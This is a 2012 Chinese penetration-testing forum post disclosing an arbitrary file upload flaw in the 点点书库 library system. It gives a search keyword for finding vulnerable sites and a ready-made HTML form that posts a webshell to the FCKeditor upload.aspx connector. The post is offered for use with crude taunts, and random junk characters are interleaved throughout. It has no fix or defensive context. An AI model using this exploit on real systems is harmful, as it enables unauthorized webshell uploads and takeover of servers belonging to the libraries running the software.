中国网络渗透测试联盟
标题:
点点书库图书馆系统文件上传漏洞
[打印本页]
作者:
admin
时间:
2012-9-10 21:20
标题:
点点书库图书馆系统文件上传漏洞
主题:图书馆系统任意文件上传漏洞
) F7 u: r" y- x# W
作者:冰锋刺客
4 E. m0 v1 I$ x0 y
厂商:点击书(dianjishu.com)
5 |* {' b. J. \; D0 U: F
日期:2012-6-21
2 z% b* K9 a+ F' i0 E3 n7 c" m$ C
4 {# a. f, Q2 J; a( l/ E
I 概述
. B) X9 L' `6 U7 N# g* s9 W, z
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
4 Y5 _& ]! V3 A/ o" a" L9 ?: F
II 简介
% \7 r$ j: }5 q1 |, \. G
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
6 m9 A: k2 n1 Q7 V6 R; B: }+ o; p
补充一个漏洞
3 J* i |: c) F( y7 Y! ~8 `
<form id="frmUpload" enctype="multipart/form-data"
+ _1 z1 f- G+ L7 @! O7 T2 B
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
1 u4 I% v! i: _" ^+ R f, ^
<input id="btnUpload" type="submit" value="操翻他">
+ |# O9 e- l8 {2 p" B9 X1 Q
</form>
8 `9 q$ E, f1 ~, I
你们懂的
2 A+ t' ]4 ? M+ U' G9 M
那傻逼提供还需要改包.
" m& c$ D3 I7 ?9 ]* ?
自己看了下源代码发现fckeditor
6 L( k" S7 ]* Q: }- T# P
直接秒杀
1 z( h" w8 Q y
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2